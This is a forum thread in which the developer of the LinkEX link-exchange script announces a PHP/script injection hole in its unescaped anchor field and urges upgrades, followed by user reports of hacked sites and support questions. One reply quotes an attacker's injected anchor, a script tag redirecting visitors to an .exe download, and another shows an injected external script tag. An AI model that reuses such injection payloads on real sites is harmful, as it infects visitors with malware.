LinkEX

Hi guys,

I'm sorry to tell you that an exploit has been found in LinkEX affecting all releases up untill ver.20070827.

In short, that field called "Site title" is not properly escaped, so people can enter some PHP code, which
will be executed when you include the output file on your homepage.

The exploit has been posted in public, and I have been given no chance to release the fix before people has learnt about
this exploit, so please be aware that you are not affected.

To fix the issue, please upgrade you installations to the latest, ver.20070827.
Once upgraded, please verify all links, to make sure the anchor is escaped properly.

I'll be online all week, almost 24/7 so if you need help, send me an email or give me a shout on ICQ.
http://linkex.dk/contact.html

- v0id

The announcement of the exploit by fluffygrrl
http://www.gofuckyourself.com/showthread.php?t=763605

To upgrade your linkex, you have two options:

Either log in to the admin interface, goto "About" and click any of the links saying upgrade. LinkEX will now
fetch the latest release from linkex.dk, and install it.

Or you can goto http://linkex.dk/download.html and get the latest release, unpack the archive and upload/overwrite the
allready existing index.php file in your linkex folder.

Depending on what version you were running you might have to take a few actions, but LinkEX will let you know about it.

If in doubt, please contact me, and I'll help you out.

- v0id

I have just sent the following email to all the addresses I have from the forums and support questions from the form
mail.
I have also posted on the forums I regular vists, but I need the word to be spread that people should upgrade their
LinkEX! Please let everyone you know using LinkEX about this issue!


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A dangerous exploit has been discovered in all versions of LinkEX, making it possible for people to execute PHP code on
your homepage.
The field called "Site title" the template variable $ANCHOR was not escaped properly, so people could enter
PHP code, which would be inserted into the output file, and when included on the homepage, executed.

I have not heard of any servers being compromised yet, but the exploit was revealed on a rather huge forum "Go Fuck
Yourself".

To fix the issue, simple upgrade your LinkEX to the latest version, to learn more about how to do this, read the posts
on http://linkex.dk/forums/t1244-exploit-in-linkex-please-be-aware.html

To help preventing a disaster please let people you know using LinkEX about this exploit and have them upgrade their
LinkEX. Thanks.

- v0id
ICQ: 44547912

hi this hapened at +-200 sites of me, a person place java in the anchor and all sites are redirecting now:(

gotta FIX it now dudes



---------------------
This is a message from 12webcamz.nl.

A new link was just added:
Email: akdfjghkdf@microsoft.com
Link URL: http://filedownload.redirect.hm/test.html (IP:76.23.177.105)
Recip URL: http://filedownload.redirect.hm/test.html (IP:76.23.177.105)
Anchor text: <script>window.location="http://filedownload.redirect.hm/file.exe";</script>
PageRank: 0

yes, it's very important you guys update your installations!

If you can't for some wierd reason, you should at least blacklist the "word" <
Just create a new entry and add "<" as the value

- v0id

i'm having a problem with my install (please see below) - which, when
i looked at your demo sources, exactly duplicates my problem.

please help.

thanks,
stuart


Warning: main(/partners/data/output/1009): failed to open stream: No such file or directory in
/home/smhjv/public_html/partners/testlinks.php on line 19

Warning: main(): Failed opening '/partners/data/output/1009' for inclusion
(include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/smhjv/public_html/partners/testlinks.php on line 19

oops, i guess that was the wrong place to post it -
i thought it went to email.....

my apologies, but would appreciate your help.

stuart

i 'fixed' it. it only seems to work when i put in the full URL
instead of the default, which was '/partners/data/output/1009'

any idea why?

stuart

hi,

it seems that you have a leading /, which tell the script to look in the root folder. Either use the full path or use a
relative path in your index.php

<?php include( './partners/data/output/1009' ); // relative ?>
<?php include( '/home/smhjv/public_html/partners/data/output/1009' ); // full path ?>

Thanks for pointing out the error in the demo :)

- v0id

Hi

Im getting virus/trojan error on my site & my host now after checking 2 days says it i because of linkex script

What happen is it inserts Javacode in starting Header of my site randomly after few minutes or hours

###################################################
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transiti onal//EN"
" http : / / w w w . w 3 . o rg/TR/html4/loose.dtd " >
< h tml >
<..head..><..script language='JavaScript' type='text/javascript' src='jjort.js'..><../..script> (THIS
IS VIRUS)


< meta http-equiv= " Content-Type" content =" text/html; charset=iso-8859-1" >

###################################################

It Creates Java File of 5 letters on execution

Does someone is having same problem

Regards

John

ALSO adding to above my version is

v.20071019 © linkex.dk 2006-2007

regards

John

hi there John,

can I ask you to contact me on icq? I'd like to know more about what is going on with your LinkEX.
I'm not really sure how LinkEX can put the script inside your header..

- v0id

whoo!
i didn't know that ANYONE besides myself had ICQ any more.

my account is so old - it's only 7 numbers........

regards,
stuart
InternetMarketingProfitCenter.com
NetActivated.com

ah I keep forgetting that, I'm available on other IM's also, but I use ICQ the most. Old habbit I think, but it seems
that most adult webmasters use ICQ alot.

7 numbers is pretty old, mine got 8 :/

- v0id